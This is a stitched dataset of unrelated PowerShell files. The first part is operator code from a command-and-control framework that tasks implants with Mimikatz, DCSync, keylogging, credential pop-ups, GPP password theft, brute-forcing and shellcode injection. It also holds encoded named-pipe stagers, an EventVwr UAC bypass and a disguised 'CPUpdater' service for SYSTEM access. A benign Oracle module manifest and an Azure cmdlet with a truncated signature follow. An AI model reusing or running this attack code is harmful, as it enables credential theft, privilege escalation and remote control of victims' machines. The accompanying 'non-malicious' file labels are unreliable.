if ($pscommand.ToLower().StartsWith('invoke-psinject'))
{
CheckModuleLoaded "invoke-psinject.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-inveigh'))
{
CheckModuleLoaded "inveigh.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('get-bloodhounddata'))
{
CheckModuleLoaded "bloodhound.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-sniffer'))
{
CheckModuleLoaded "invoke-sniffer.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('test-adcredential'))
{
CheckModuleLoaded "test-adcredential.ps1" $psrandomuri
}
if ($pscommand.ToLower() -eq 'invoke-allchecks')
{
CheckModuleLoaded "Powerup.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-allchecks'))
{
CheckModuleLoaded "Powerup.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-privescaudit'))
{
CheckModuleLoaded "Powerup.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-wscriptuacbypass'))
{
CheckModuleLoaded "Invoke-WScriptBypassUAC.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-hostscan'))
{
CheckModuleLoaded "Invoke-Hostscan.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('get-recentfiles'))
{
CheckModuleLoaded "Get-RecentFiles.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-tokenmanipulation'))
{
CheckModuleLoaded "Invoke-TokenManipulation.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-inveigh'))
{
CheckModuleLoaded "Inveigh.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-smbexec'))
{
CheckModuleLoaded "Invoke-SMBExec.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('new-zipfile'))
{
CheckModuleLoaded "Zippy.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-smblogin'))
{
CheckModuleLoaded "Invoke-SMBExec.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-wmiexec'))
{
CheckModuleLoaded "Invoke-WMIExec.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-pipekat'))
{
CheckModuleLoaded "Invoke-Pipekat.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('get-net'))
{
CheckModuleLoaded "PowerView.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('get-domain'))
{
CheckModuleLoaded "PowerView.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-mapdomaintrust'))
{
CheckModuleLoaded "PowerView.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('get-domain'))
{
CheckModuleLoaded "PowerView.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-kerb'))
{
CheckModuleLoaded "PowerView.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-mimikatz'))
{
CheckModuleLoaded "Invoke-Mimikatz.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-userhunter'))
{
CheckModuleLoaded "PowerView.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-sharefinder'))
{
CheckModuleLoaded "PowerView.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('get-netshare'))
{
CheckModuleLoaded "PowerView.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-dcsync'))
{
CheckModuleLoaded "Invoke-DCSync.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('get-keystrokes'))
{
CheckModuleLoaded "Get-Keystrokes.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('arpscan'))
{
CheckModuleLoaded "Invoke-Arpscan.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('portscan'))
{
CheckModuleLoaded "PortScanner.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('invoke-portscan'))
{
CheckModuleLoaded "Invoke-Portscan.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('inject-shellcode'))
{
CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('get-mshotfixes'))
{
CheckModuleLoaded "Get-MSHotFixes.ps1" $psrandomuri
}
if ($pscommand.ToLower().StartsWith('get-gpppassword'))
{
CheckModuleLoaded "Get-GPPPassword.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('invoke-wmicommand'))
{
CheckModuleLoaded "Invoke-WMICommand.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('invoke-hostenum'))
{
CheckModuleLoaded "HostEnum.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('find-allvulns'))
{
CheckModuleLoaded "sherlock.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('dump-ntds'))
{
CheckModuleLoaded "dump-ntds.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('brute-ad'))
{
CheckModuleLoaded "brute-ad.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('brute-locadmin'))
{
CheckModuleLoaded "brute-locadmin.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('get-passpol'))
{
CheckModuleLoaded "get-passpol.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('get-locadm'))
{
CheckModuleLoaded "get-locadm.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('invoke-runas'))
{
CheckModuleLoaded "invoke-runas.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('invoke-shellcode'))
{
CheckModuleLoaded "invoke-shellcode.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('get-pass-notexp'))
{
CheckModuleLoaded "get-pass-notexp.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('invoke-winrmsession'))
{
CheckModuleLoaded "Invoke-WinRMSession.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('get-computerinfo'))
{
CheckModuleLoaded "Get-ComputerInfo.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('get-userinfo'))
{
CheckModuleLoaded "Get-UserInfo.ps1" $psrandomuri
}
if ($pscommand.tolower().startswith('sharpsocks'))
{
CheckModuleLoaded "sharpsocks.ps1" $psrandomuri
$Key = Create-AesKey
$Channel = Get-RandomURI -Length 25
$IP = Read-Host "Local IP Address to bind to, e.g. http://172.16.0.1:80"
start-process "powershell" -ArgumentList "-exec bypass -noexit -c import-module $($PoshPath)\Modules\SharpSocks.ps1; SharpSocks -Server -Channel $Channel -Key $Key -Uri $IP" -WindowStyle Minimized
$pscommand = "$($pscommand) -Client -Channel $Channel -Key $Key -URLs $SocksURLs"
}
if ($pscommand.tolower().startswith('invoke-enum'))
{
CheckModuleLoaded "Get-ComputerInfo.ps1" $psrandomuri
CheckModuleLoaded "Get-MSHotFixes.ps1" $psrandomuri
CheckModuleLoaded "PowerView.ps1" $psrandomuri
CheckModuleLoaded "Get-RecentFiles.ps1" $psrandomuri
CheckModuleLoaded "POwerup.ps1" $psrandomuri
CheckModuleLoaded "Get-FirewallRules.ps1" $psrandomuri
CheckModuleLoaded "Get-GPPPassword.ps1" $psrandomuri
CheckModuleLoaded "Get-WLANPass.ps1" $psrandomuri
$query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "Netstat -anp tcp; Netstat -anp udp; Net share; Ipconfig; Net view; Net users; Net localgroup administrators; Net accounts; Net accounts dom;"
} | Out-Null
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "Get-Proxy; Invoke-allchecks; Get-MShotfixes"
} | Out-Null
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "Get-Firewallrulesall | out-string -width 200"
} | Out-Null
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "Get-Screenshot"
} | Out-Null
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "Get-GPPPassword"
} | Out-Null
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "Get-Content 'C:\ProgramData\McAfee\Common Framework\SiteList.xml'"
} | Out-Null
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "Get-WmiObject -Class Win32_Product"
} | Out-Null
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "Get-ItemProperty -Path `"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`" -Name CachedLogonsCount"
} | Out-Null
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "Get-ItemProperty -Path `"HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters`""
} | Out-Null
$pscommand = "Get-RecentFiles; Get-WLANPass"
}
if ($pscommand.ToLower().StartsWith('invoke-runaspayload'))
{
CheckModuleLoaded "NamedPipe.ps1" $psrandomuri
CheckModuleLoaded "Invoke-RunAs.ps1" $psrandomuri
$pscommand = $pscommand -replace 'invoke-runaspayload', ''
$psCommandBase = "add-Type -assembly System.Core; `$pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); `$pi.Connect(); `$pr = new-object System.IO.StreamReader(`$pi); iex `$pr.ReadLine();"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($psCommandBase)
$encodedCommand= [Convert]::ToBase64String($bytes)
$pscommand = "invoke-runas $($pscommand) -command C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -Args `" -e $encodedCommand`""
}
if ($pscommand.ToLower().StartsWith('invoke-runasproxypayload'))
{
if (Test-Path "$FolderPath\payloads\proxypayload.bat"){
$proxypayload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat"
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = '$proxypayload = "'+$proxypayload+'"'
} | Out-Null
CheckModuleLoaded "NamedPipeProxy.ps1" $psrandomuri
CheckModuleLoaded "Invoke-RunAs.ps1" $psrandomuri
$pscommand = $pscommand -replace 'invoke-runasproxypayload', ''
$psCommandBase = "add-Type -assembly System.Core; `$pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); `$pi.Connect(); `$pr = new-object System.IO.StreamReader(`$pi); iex `$pr.ReadLine();"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($psCommandBase)
$encodedCommand= [Convert]::ToBase64String($bytes)
$pscommand = "invoke-runas $($pscommand) -command C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -Args `" -e $encodedCommand`""
} else {
write-host "Need to run CreateProxyPayload first"
$pscommand = $null
}
}
if ($pscommand.ToLower().StartsWith('invoke-runasdaisypayload'))
{
$name = Read-Host "Name"
if (Test-Path "$FolderPath\payloads\$($name).bat"){
$daisypayload = Get-Content -Path "$FolderPath\payloads\$($name).bat"
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = '$daisypayload = "'+$daisypayload+'"'
} | Out-Null
CheckModuleLoaded "NamedPipeDaisy.ps1" $psrandomuri
CheckModuleLoaded "Invoke-RunAs.ps1" $psrandomuri
$pscommand = $pscommand -replace 'invoke-runasdaisypayload', ''
$psCommandBase = "add-Type -assembly System.Core; `$pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); `$pi.Connect(); `$pr = new-object System.IO.StreamReader(`$pi); iex `$pr.ReadLine();"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($psCommandBase)
$encodedCommand= [Convert]::ToBase64String($bytes)
$pscommand = "invoke-runas $($pscommand) -command C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -Args `" -e $encodedCommand`""
} else {
write-host "Need to run Invoke-DaisyChain first"
$pscommand = $null
}
}
if ($pscommand.ToLower().StartsWith('createmacropayload'))
{
$pscommand|Invoke-Expression
$pscommand = $null
}
if ($pscommand.ToLower().StartsWith('invoke-daisychain'))
{
$output = Invoke-Expression $pscommand
$pscommand = $output
}
if ($pscommand.ToLower().StartsWith('createproxypayload'))
{
$pscommand|Invoke-Expression
$pscommand = $null
}
if (($pscommand.ToLower().StartsWith('upload-file')) -or ($pscommand.ToLower().StartsWith('uploadfile')))
{
$pscommand = $pscommand -replace "uploadfile","upload-file"
$output = Invoke-Expression $pscommand
$pscommand = $output
}
if ($pscommand.ToLower().StartsWith('createpayload'))
{
$pscommand|Invoke-Expression
$pscommand = $null
}
if ($pscommand -eq 'cred-popper')
{
CheckModuleLoaded "Cred-Popper.ps1" $psrandomuri
}
if (($pscommand.ToLower().StartsWith('sleep')) -or ($pscommand.ToLower().StartsWith('beacon')) -or ($pscommand.ToLower().StartsWith('set-beacon')) -or ($pscommand.ToLower().StartsWith('setbeacon')))
{
$pscommand = $pscommand -replace 'set-beacon ', ''
$pscommand = $pscommand -replace 'setbeacon ', ''
$pscommand = $pscommand -replace 'sleep ', ''
$pscommand = $pscommand -replace 'beacon ', ''
$sleeptime = $pscommand
if ($sleeptime.ToLower().Contains('m')) {
$sleeptime = $sleeptime -replace 'm', ''
[int]$newsleep = $sleeptime
[int]$newsleep = $newsleep * 60
}
elseif ($sleeptime.ToLower().Contains('h')) {
$sleeptime = $sleeptime -replace 'h', ''
[int]$newsleep1 = $sleeptime
[int]$newsleep2 = $newsleep1 * 60
[int]$newsleep = $newsleep2 * 60
}
elseif ($sleeptime.ToLower().Contains('s')) {
$newsleep = $sleeptime -replace 's', ''
} else {
$newsleep = $sleeptime
}
$pscommand = '$sleeptime = '+$newsleep
$query = "UPDATE Implants SET Sleep=@Sleep WHERE RandomURI=@RandomURI"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
Sleep = $newsleep
RandomURI = $psrandomuri
} | Out-Null
}
if ($pscommand -eq 'invoke-ms16-032')
{
CheckModuleLoaded "NamedPipe.ps1" $psrandomuri
$pscommand = "LoadModule invoke-ms16-032.ps1"
}
if ($pscommand -eq 'invoke-ms16-032-proxypayload')
{
if (Test-Path "$FolderPath\payloads\proxypayload.bat"){
CheckModuleLoaded "proxypayload.ps1" $psrandomuri
CheckModuleLoaded "NamedPipeProxy.ps1" $psrandomuri
$pscommand = "LoadModule invoke-ms16-032-proxy.ps1"
} else {
write-host "Need to run CreateProxyPayload first"
$pscommand = $null
}
}
if ($pscommand -eq 'invoke-uacbypassproxy')
{
if (Test-Path "$FolderPath\payloads\proxypayload.bat"){
CheckModuleLoaded "ProxyPayload.ps1" $psrandomuri
CheckModuleLoaded "NamedPipeProxy.ps1" $psrandomuri
CheckModuleLoaded "Invoke-EventVwrBypass.ps1" $psrandomuri
$pspayloadnamedpipe = "`$pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); `$pi.Connect(); `$pr = new-object System.IO.StreamReader(`$pi); iex `$pr.ReadLine();"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($pspayloadnamedpipe)
$payloadraw = 'powershell -exec bypass -Noninteractive -windowstyle hidden -e '+[Convert]::ToBase64String($bytes)
$pscommand = "Invoke-EventVwrBypass -Command `"$payloadraw`""
} else {
write-host "Need to run CreateProxyPayload first"
$pscommand = $null
}
}
if ($pscommand -eq 'invoke-uacbypass')
{
$payload = Get-Content -Path "$FolderPath\payloads\payload.bat"
CheckModuleLoaded "Invoke-EventVwrBypass.ps1" $psrandomuri
CheckModuleLoaded "NamedPipe.ps1" $psrandomuri
$pspayloadnamedpipe = "`$pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); `$pi.Connect(); `$pr = new-object System.IO.StreamReader(`$pi); iex `$pr.ReadLine();"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($pspayloadnamedpipe)
$payloadraw = 'powershell -exec bypass -Noninteractive -windowstyle hidden -e '+[Convert]::ToBase64String($bytes)
$pscommand = "Invoke-EventVwrBypass -Command `"$payloadraw`""
}
if ($pscommand -eq 'Get-System')
{
$payload = Get-Content -Path "$FolderPath\payloads\payload.bat"
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "sc.exe create CPUpdater binpath= 'cmd /c "+$payload+"' Displayname= CheckpointServiceUpdater start= auto"
} | Out-Null
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "sc.exe start CPUpdater"
} | Out-Null
$pscommand = "sc.exe delete CPUpdater"
}
if ($pscommand -eq 'Get-System-WithProxy')
{
if (Test-Path "$FolderPath\payloads\proxypayload.bat"){
$payload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat"
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "sc.exe create CPUpdater binpath= 'cmd /c "+$payload+"' Displayname= CheckpointServiceUpdater start= auto"
} | Out-Null
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "sc.exe start CPUpdater"
} | Out-Null
$pscommand = "sc.exe delete CPUpdater"
} else {
write-host "Need to run CreateProxyPayload first"
$pscommand = $null
}
}
if ($pscommand -eq 'Get-System-WithDaisy')
{
$name = Read-Host "Name"
if (Test-Path "$FolderPath\payloads\$($name).bat"){
$payload = Get-Content -Path "$FolderPath\payloads\$($name).bat"
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "sc.exe create CPUpdater binpath= 'cmd /c "+$payload+"' Displayname= CheckpointServiceUpdater start= auto"
} | Out-Null
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $psrandomuri
Command = "sc.exe start CPUpdater"
} | Out-Null
$pscommand = "sc.exe delete CPUpdater"
} else {
write-host "Need to run Invoke-DaisyChain first"
$pscommand = $null
}
}
if ($pscommand -eq 'Hide-Implant')
{
$pscommand = "Hide"
}
if ($pscommand -eq 'Unhide-Implant' ) {
Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET Alive='Yes' WHERE RandomURI='$psrandomuri'" | Out-Null
}
$pscommand
}
while($true)
{
$global:command = Read-Host -Prompt $global:cmdlineinput
if ($global:command)
{
$query = "INSERT INTO History (Command)
VALUES (@Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
Command = $global:command
} | Out-Null
if ($global:implantid -eq "ALL")
{
if ($global:command -eq 'back' -or $global:command -eq 'exit')
{
startup
}
elseif ($global:command -eq 'help')
{
print-help
}
elseif ($global:command.ToLower().StartsWith('help'))
{
$global:command = $global:command -replace 'help ',''
print-help $global:command
}
elseif ($global:command -eq '?')
{
print-help
}
else
{
$dbresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT RandomURI FROM Implants WHERE Alive='Yes'" -As SingleValue
foreach ($implanturisingular in $dbresults)
{
$global:randomuri = $implanturisingular
$outputcmd = runcommand $global:command $global:randomuri
if (($outputcmd -eq 'exit' ) -or ($outputcmd -eq 'hide' ))
{
Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET Alive='No' WHERE RandomURI='$implanturisingular'"|Out-Null
}
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $implanturisingular
Command = $outputcmd
} | Out-Null
}
}
}
elseif ($global:implantid.contains(",")){
if ($global:command -eq 'back' -or $global:command -eq 'exit')
{
startup
}
elseif ($global:command -eq 'help')
{
print-help
}
elseif ($global:command.ToLower().StartsWith('help'))
{
$global:command = $global:command -replace 'help ',''
print-help $global:command
}
elseif ($global:command -eq '?')
{
print-help
}
else
{
$global:implantid.split(",")| foreach {
$global:randomuri = Invoke-SqliteQuery -DataSource $Database -Query "SELECT RandomURI FROM Implants WHERE ImplantID='$_'" -as SingleValue
$outputcmd = runcommand $global:command $global:randomuri
if (($global:command -eq 'exit' ) -or ($outputcmd -eq 'hide' ))
{
Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET Alive='No' WHERE RandomURI='$global:randomuri'"|Out-Null
}
$query = "INSERT INTO NewTasks (RandomURI, Command)
VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $global:randomuri
Command = $outputcmd
} | Out-Null
}
}
}
else
{
if ($global:command -eq 'back' -or $global:command -eq 'exit')
{
startup
}
elseif ($global:command -eq 'help')
{
print-help
}
elseif ($global:command.ToLower().StartsWith('help'))
{
$global:command = $global:command -replace 'help ',''
print-help $global:command
}
elseif ($global:command -eq '?')
{
print-help
}
else
{
$outputcmd = runcommand $global:command $global:randomuri
if ($outputcmd -eq 'hide')
{
Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET Alive='No' WHERE RandomURI='$global:randomuri'"|Out-Null
$outputcmd = $null
}
if ($outputcmd) {
$query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)"
Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{
RandomURI = $global:randomuri
Command = $outputcmd
} | Out-Null
}
}
}
}
}
}
|
combined_dataset/train/non-malicious/sample_14_18.ps1
|
sample_14_18.ps1
|
#
# Module manifest for module 'OCI.PSModules.Resourcesearch'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Resourcesearch.dll'
# Version number of this module.
ModuleVersion = '81.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '7fdc6e7d-ec41-48a8-9c23-5e5149a3e83b'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Resourcesearch Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '81.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Resourcesearch.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIResourcesearchResourceType',
'Get-OCIResourcesearchResourceTypesList',
'Invoke-OCIResourcesearchSearchResources'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Resourcesearch'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_65_45.ps1
|
sample_65_45.ps1
|
# ----------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code
# is regenerated.
# ----------------------------------------------------------------------------------
<#
.Synopsis
Create an in-memory object for Databricks.
.Description
Create an in-memory object for Databricks.
.Outputs
Microsoft.Azure.PowerShell.Cmdlets.MachineLearningServices.Models.Api20240401.Databricks
.Link
https://learn.microsoft.com/powershell/module/Az.MachineLearningServices/new-AzMLWorkspaceDatabricksObject
#>
function New-AzMLWorkspaceDatabricksObject {
[OutputType('Microsoft.Azure.PowerShell.Cmdlets.MachineLearningServices.Models.Api20240401.Databricks')]
[CmdletBinding(PositionalBinding=$false)]
Param(
[Parameter(HelpMessage="The description of the Machine Learning compute.")]
[string]
$Description,
[Parameter(HelpMessage="Opt-out of local authentication and ensure customers can use only MSI and AAD exclusively for authentication.")]
[bool]
$DisableLocalAuth,
[Parameter(HelpMessage="ARM resource id of the underlying compute.")]
[string]
$ResourceId,
[Parameter(HelpMessage="Databricks access token.")]
[string]
$AccessToken,
[Parameter(HelpMessage="Workspace Url.")]
[string]
$WorkspaceUrl
)
process {
$Object = [Microsoft.Azure.PowerShell.Cmdlets.MachineLearningServices.Models.Api20240401.Databricks]::New()
$Object.Type = 'Databricks'
if ($PSBoundParameters.ContainsKey('Description')) {
$Object.Description = $Description
}
if ($PSBoundParameters.ContainsKey('DisableLocalAuth')) {
$Object.DisableLocalAuth = $DisableLocalAuth
}
if ($PSBoundParameters.ContainsKey('ResourceId')) {
$Object.ResourceId = $ResourceId
}
if ($PSBoundParameters.ContainsKey('Type')) {
}
if ($PSBoundParameters.ContainsKey('AccessToken')) {
$Object.AccessToken = $AccessToken
}
if ($PSBoundParameters.ContainsKey('WorkspaceUrl')) {
$Object.WorkspaceUrl = $WorkspaceUrl
}
return $Object
}
}
# SIG # Begin signature block
# MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBuUr/qhZxypy/j
# NdRpR7AevvrSWsm8USChGKEUNd9R/6CCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
